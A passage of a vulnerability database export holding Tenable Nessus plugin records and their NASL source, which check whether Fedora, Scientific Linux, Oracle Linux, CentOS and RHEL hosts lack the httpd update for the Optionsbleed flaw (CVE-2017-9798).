audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"httpd-2.4.27-3.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:31", "description": "Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:mod_ldap", "p-cpe:/a:fermilab:scientific_linux:mod_proxy_html", "p-cpe:/a:fermilab:scientific_linux:mod_session", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20171011_HTTPD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/103806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103806);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. (CVE-2017-9798)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1710&L=scientific-linux-errata&F=&S=&P=9988\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e195877f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"httpd-manual-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:42", "description": "From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ldap", "p-cpe:/a:oracle:linux:mod_proxy_html", "p-cpe:/a:oracle:linux:mod_session", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103803", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# Oracle Linux Security Advisory ELSA-2017-2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103803);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-October/007263.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.0.1.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:57", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "CentOS 7 : httpd (CESA-2017:2882) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:mod_ldap", "p-cpe:/a:centos:centos:mod_proxy_html", "p-cpe:/a:centos:centos:mod_session", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103790", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# CentOS Errata and Security Advisory 2017:2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103790);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"CentOS 7 : httpd (CESA-2017:2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-October/022565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?68e97394\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7.centos.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:12:22", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "RHEL 7 : httpd (RHSA-2017:2882) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ldap", "p-cpe:/a:redhat:enterprise_linux:mod_proxy_html", "p-cpe:/a:redhat:enterprise_linux:mod_session", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103804", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2882. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103804);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"RHEL 7 : httpd (RHSA-2017:2882) (Optionsbleed)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 